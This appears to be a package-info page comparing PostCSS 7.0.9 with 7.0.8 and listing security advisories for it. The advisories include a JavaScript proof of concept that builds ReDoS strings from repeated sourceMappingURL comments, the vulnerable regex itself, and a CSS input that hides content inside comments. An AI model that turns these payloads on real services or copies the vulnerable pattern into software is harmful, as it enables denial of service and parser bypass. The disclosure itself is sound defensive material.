PostCSS version 7.0.9 introduces subtle but important enhancements over its predecessor, version 7.0.8. Both versions serve as powerful tools for transforming styles with JavaScript plugins, enabling developers to automate CSS tasks and extend CSS functionality. The core functionalities remain consistent: processing CSS with JavaScript, applying various transformations, and maintaining compatibility with a wide range of plugins.
The key difference lies in an update to a dependency. Version 7.0.9 upgrades supports-color from version 6.0.0 to version 6.1.0. While seemingly minor, this update likely addresses bug fixes or potential security vulnerabilities within the supports-color package, ensuring better color support detection in different terminal environments. This translates to a more consistent and reliable experience for developers who rely on terminal color output for debugging or logging.
Both versions maintain the same core dependencies including chalk for stylized terminal output and source-map for debugging compiled CSS. They also share the same license (MIT), author, and repository, solidifying their place within the PostCSS ecosystem. The file count is identical at 35 files, however the unpacked size of 7.0.9 is slightly larger which may suggest a slight expansion. Ultimately, upgrading to 7.0.9 provides peace of mind through dependency updates.
All the vulnerabilities related to the version 7.0.9 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.